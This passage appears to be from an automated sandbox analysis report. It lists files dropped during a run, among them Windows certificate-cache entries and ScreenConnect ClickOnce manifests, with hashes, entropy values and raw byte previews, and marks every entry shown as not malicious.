.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3781.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6850123199247595
Encrypted:	false
SSDEEP:	96:TiZYWsxM2k/bYTY35W7gHEYEZQutHiyIezSwBSr3aoBLMLWjIjf3:2ZDhhEecYaoBLMLWsjf3
MD5:	88A5E806E4CDD91DDC2416D31EB9B041
SHA1:	8F261C89596FE482C43AAE8E50094442B903D86E
SHA-256:	804301729886F04FAD56145404ED814ED03E3500A132665532E92D624FBF8414
SHA-512:	BBA3C071CBED0CF8440AE1461C3F2A2E7518CB3E90B2EF65609190B5048DED4AC5C0BB4D1E648A5BA2BABF65D79E347DE23DC06BFB4E4EC75C6952E33293A74A
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1716
Entropy (8bit):	7.596259519827648
Encrypted:	false
SSDEEP:	48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
MD5:	D91299E84355CD8D5A86795A0118B6E9
SHA1:	7B0F360B775F76C94A12CA48445AA2D2A875701C
SHA-256:	46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
SHA-512:	6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
Malicious:	false
Preview:	0...0............@.`.L.^.....0....H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0....H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....\|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..\|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.\|f..x8E0.O.cOL....SA\|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	727
Entropy (8bit):	7.5877833615826
Encrypted:	false
SSDEEP:	12:5onfZpqc5RlRtBfQTqAsrUvF+5AcoVm6DOB1qgszZpuRa7Aaq3hvCG8+UxS+3xd:5iicdZ9AQOFwfo4JmZqhaqVE+0b
MD5:	19818DDCAC7E6D84EDDA2D202A8BD6F5
SHA1:	078A354358A3AB745489EC949E64E71B73F800A7
SHA-256:	376FD6FEC42BA09D21B131410EBD956B6C768597D3BBA28D120060CA8F8CA64C
SHA-512:	646010EA61958A0AF74CF6BF53623FDC233291CDB309B7D92DFC1CCE33444E57C693C3186B54AC7E082106FE02A48FAEFC02FF647A5EB09FC2B945F12D0DF36B
Malicious:	false
Preview:	0..........0.....+.....0......0...0..........q]dL..g?....O..20241112184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241112184215Z....20241119184215Z0....H.............%.'.O..$.)...$v.w.?..L..........]./.Y..r.O.ER..5..E.6i..n..7E.Z.8Cp....B..ml.....}...!.t.....>...+.P..fM.z\....qM v_...E]...1.y.Qu..N.._.s..a.S.g........W...:..0...$...b...._M.[.$.Y..>...G..~R....0U-...y..}.F..t.n\|.o....q(%6...I`.._6.eW.:....Ij.........\|.>n.h..b..r...?u.....)...0{.U.\.....>....Xb.R.6.im.o.et._\$Qr..;..`..Q..a.J...j.WD.>...>.....O..Tw.hX..Y..._.e#.R.1._\.....i...'_..s....M.a.X.$.....V{...3....%...x./.'x.\.Q\|h8'.E~Y>..K.B&/..0..(....:9:p....g.6.........7..V.`.Q.bj.Yd8

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1428
Entropy (8bit):	7.688784034406474
Encrypted:	false
SSDEEP:	24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
MD5:	78F2FCAA601F2FB4EBC937BA532E7549
SHA1:	DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
SHA-256:	552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
SHA-512:	BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
Malicious:	false
Preview:	0...0..x..........W..!2.9...wu\0....H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0....H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...sn..\|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..\|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0....H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	338
Entropy (8bit):	3.4616190709286063
Encrypted:	false
SSDEEP:	6:kKR4+sK8q1S8JFN+SkQlPlEGYRMY9z+s3Ql2DUevat:ZsK5S3kPlE99SCQl2DUevat
MD5:	E9FEEBD56D61C85F3F4430D0FA50AE1C
SHA1:	F07AE258E6BB91E29D6097EF058C2382C7CDF1C5
SHA-256:	00A67D929CBCA6752BC1624A511777535EF22D0D04855024E3C793F8C7866657
SHA-512:	58AC2D41615A8E1390045F402E0074D02CCD2DB6AB35AF76FC0DDE34AB61645C29C9E634455B58D68D69BFD830FF658EDE29C70F5330416C1265D09A0F5A49E3
Malicious:	false
Preview:	p...... .........s.2.5..(...............................................O.Y.@... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.236892865807448
Encrypted:	false
SSDEEP:	6:kKHptL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:htiDImsLNkPlE99SNxAhUe/3
MD5:	5EF9EE6A2999990456BFD63C1973BB84
SHA1:	5919207B5609E8E098DD0163963B75D956A265B7
SHA-256:	DB9085151E2394B025E8542457642C9E875A511120CCEF1226DBD6ED18C76470
SHA-512:	BE0DC6BD15722823DA2F8BCD977CA2EF4D6243D83A40A7E010ACE00D7CAEDE7AD5E746F0BB7FD45D9BD76A6854508D6163754AF07D27144A96332697B81416DB
Malicious:	false
Preview:	p...... ..........p3.5..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	308
Entropy (8bit):	3.1973822557716387
Encrypted:	false
SSDEEP:	6:kKlvfzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:NqtWOxSW0P3PeXJUZY
MD5:	97D9E2AC478D76AF09B557F3863D2F18
SHA1:	399F3BC92A1494C9098BD438E1D84CF0043E2EF9
SHA-256:	4DF7E0D543DEB34FB583DD817B7F3046EB0A513965E297BEA796018F51C97C2D
SHA-512:	580945D9A3D0F6854594BCF6B6DE52758D85F50490E4C1339266EFB6E168F37949A2710AA65325B514E1C5BA61E228506EAA68A7A8733A56B992A97D5C0E2C22
Malicious:	false
Preview:	p...... ........>G84.5..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	412
Entropy (8bit):	3.980945601980732
Encrypted:	false
SSDEEP:	6:kKSkn3/MiwbfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:KC30TmxMiv8sFBSfamB3rbFURMOlAkr
MD5:	F6F16B9BA1676692D3E9B60978B02CF7
SHA1:	5FBC260004BD1E987C2AD9C839FD9CA5D37D1B85
SHA-256:	98DFA725A5B8056C56E3B3956552470BEA14284DB1619162499E31436D82427F
SHA-512:	D18296335E5064C968B1DA7B29E968227C752BF819813644488E64C89CB581CA31AD6C80671C8A903BEEE05C88454ED5F9F7AE3D6D7E24B04D17702F54BCAA34
Malicious:	false
Preview:	p...... ....(......4.5..(................].25.......:.......................:.. ............5.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	254
Entropy (8bit):	3.042052853183184
Encrypted:	false
SSDEEP:	6:kKfwshLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:HwshLYS4tWOxSW0PAMsZp
MD5:	B0D1FDE2CA4C90E87B14BC07E7B26F5A
SHA1:	D263F7522FE60F6BB97A55CC301571A5F29D70FB
SHA-256:	A6CC00FD6F1F1746DE4844820B51360DC4331856F71F21B6D846EC85EC746C68
SHA-512:	8DE8025F6AC9A0EFCDD2E4AED7CD9B391F682981620420B7AD5CF19A87BBD5EAA2FF9AF615171CC3B48D7C220D24EC1BFF2AEF06CA6356C853B86A49DD28DBFA
Malicious:	false
Preview:	p...... ....l.....23.5..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\manifests\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	25496
Entropy (8bit):	5.583034514291859
Encrypted:	false
SSDEEP:	384:FOrqQeGGnph6aOX9jX9R/QPIBM7YPVqysaq5hkwxD30GPcS:FnJ/n6aOX9jX9R/QPI+0PVQd55xwGPl
MD5:	4544E077A2DEF9FE9FE8DC9EADC25DF2
SHA1:	DC6A03BCCC65F5E2FAF41AB4F3521E476DB145DE
SHA-256:	47A11FDCF5157C586B1297884D9A274454BC84C042F1FD85BB736FDB8A89C307
SHA-512:	12E988ACD62FAEEB5EA01C42999B51943D10F62B6A9B519122BE1382D8B5C4B01A6E7CF71F9344DBF715C6057DDBCCE2A10803DBD7139F41BB56FB28FB202F1E
Malicious:	false
Preview:	PcmH........]....y2f.......!...T...........................e...?....<.g..J.\|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$............?..]k.......S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K.....E..X.N....u..IV..R......D..S......3LD.SV...[s.T..<Y...O.&r..Vz\...........`.......=...O...T...W...Z...].......,.......L.......T.......\.......`.......\|...........................................@.......0...........<.......T.......h.......\|...0.......................................0...........<.......T.......h.......\|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\manifests\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
Category:	dropped
Size (bytes):	17858
Entropy (8bit):	5.96124399589564
Encrypted:	false
SSDEEP:	384:rexTuzvdu98aXVEf6/DX9mX9FX9R/QPIYM7Y7:rn6/DX9mX9FX9R/QPIN07
MD5:	7F68A01C2FEA1C80A75E287BB36D6B43
SHA1:	F271EBC2542397E59C3D57D30CC54BF1D9DB4F69
SHA-256:	2E0E46F395D5A6440F179B61C4008ABF3D72CFCDA705A543C8EE18B41D37B025
SHA-512:	C6C1C9D6D9C50F94C9BC8C8A422CD00397EE184B6F6113EA19F9209C0E2339B540EE92D35BCCE81F242D6FDC3C720EC2E56675E702E90C91533A07FA9F9DB753
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.3.7.9067" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.3.7.9067" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\manifests\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	3452
Entropy (8bit):	4.1944948810811855
Encrypted:	false
SSDEEP:	48:GIIE/eF7lMDWWuLgoQe6S+9owQX7gn7mLyDnh94l1+o1fL+khIYX:GIPWWteV+WwQXUmLyDnwl1+o1zRhIYX
MD5:	F7964D231C1ABDD0D1F6361B579112F7
SHA1:	76F0456E6D7446FF712406568B79609FA26A7CD7
SHA-256:	8DDF07983D8FFF12F2DE055781338EBE5EDCCF67A81183F68523E5C260B04847
SHA-512:	02CEE2A057B36F90357D195B5ED8C99AF302ED6BAD4632489510455FA396E34D006E4CC19E9952AB305846D87ADF4FA37FD739D5CC9BD2B20F3BE28EE65B769C
Malicious:	false
Preview:	PcmH........^.}.....#...(.......T..........................."........<.g..J.\|r,..`P..............E..X......U..c...................'-........s".I...R.....$............?..]k.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...............................................y...............................................y...............................................y...............................................y...nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.3.7.9067%....................................................MdHd............D...........MdSp(...$...&...(...#............... urn:schemas

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\manifests\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1215
Entropy (8bit):	5.1306699113418395
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onR+geP0AQavSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AQ2GVETDTo
MD5:	293C100B1896E7532D241DAC2B32DCB3
SHA1:	1E14B49C9AF799DA0371474BF712F3AC3E5B6EBC
SHA-256:	AC3C489C02264FF1918FC0B79083A7754B98542A6CC4E2AF67EAFDBF76C6232E
SHA-512:	ED3935D90F48043BE2BF7A60CACBB47964672EAB0C9EBFC2EEAC8EBC4341383F32F55901601DE56698EEF6AEC6399E77EB8DEC6F5158D1B3761D5F25ADFC3499
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\manifests\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	5256
Entropy (8bit):	4.327770985906652
Encrypted:	false
SSDEEP:	96:LSP+RxlSKeV+Ww7NkjfjL4DTMD+29MngnsRK:7Rxl8Jxjf3yTMKQv
MD5:	6C6289A1923FE35BE8EC4C1AB46DEAE8
SHA1:	D5A65F3E055E5FFF9D8D40CAFAE325EB6DB83C88
SHA-256:	D83B501ADF6C332D2C118174BAA4B0BAF52FA9DE65FAD9C56A1F03C886F13CCA
SHA-512:	E39E595AF17EBC28A06A115EFF3642D45F923A4330B2F783158E4FE1A9DF6D6EBDB2F85D8C643FA570C0C391A003DDD8073FD2161B386DBA31E2ABAD5EBBDAA6
Malicious:	false
Preview:	PcmH............U2[.4...t.......T...............P...........3........<.g..J.\|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$............?..]k.....[.......................z..w.....[~31.X......E..X.....s".I...R....C.........y..&..d."....B(.....#...^.ie...u&...F.....Ey)....+.`...m,......;../............... ...$...'...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........h...@.......................................(...................$.......8...(...H.......p.......x...(...............................(.......................(... .......H.......P...(...`...................(.......................(...............d...........l...............................................y...............................................y...............................................y...............................................y.......................

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\manifests\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1980
Entropy (8bit):	5.057602063510745
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRbggeP0AQYvSkcyMQgcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AQ0HMQgGQAXRTFgTo
MD5:	88ECD545BDBE3ED49C6A2B87589102EC
SHA1:	E72949AF66B0A20E50474D2005E320BA63BA9B2B
SHA-256:	D48AFB709E61B86EB6EEF67B41D0FA7EC780C4536F5CF9ACA7A0B440AED98EF0
SHA-512:	7ED19ED32E02348ABC8A64CA0A21E05496A6595A8B94D3F960CF3F6A6C6445D30AAD7AEC09CE76776023F9E5F4B40DF032408DEFFBA102026247099879CB95DE
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\manifests\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	6584
Entropy (8bit):	4.163769008506759
Encrypted:	false
SSDEEP:	96:I4GBPPbpvIeV+Wwwx8Wpm2TOtPO6gb6OL6zV2iIEn6qB/B:IPPlJxpmZPQb6OOwiN6k
MD5:	35621253EE059D3A75C86FED74F8B8F7
SHA1:	389BFB927663BA2AA1B5C658B0FE368EB94C38D6
SHA-256:	7CBBDF1C50D4B00B6A29FFDDA8BDA0E563B39751778502C3E93BA78BCDBB8136
SHA-512:	8BE3F79BC711797C25B1D4A87E02757547ACDD2F20707BD45724D44BC3C36997B71DE4C8B5AB8BF5C5E7C6E146F41CB5759CA1589C6AF46C453B13EA4786EDD9
Malicious:	false
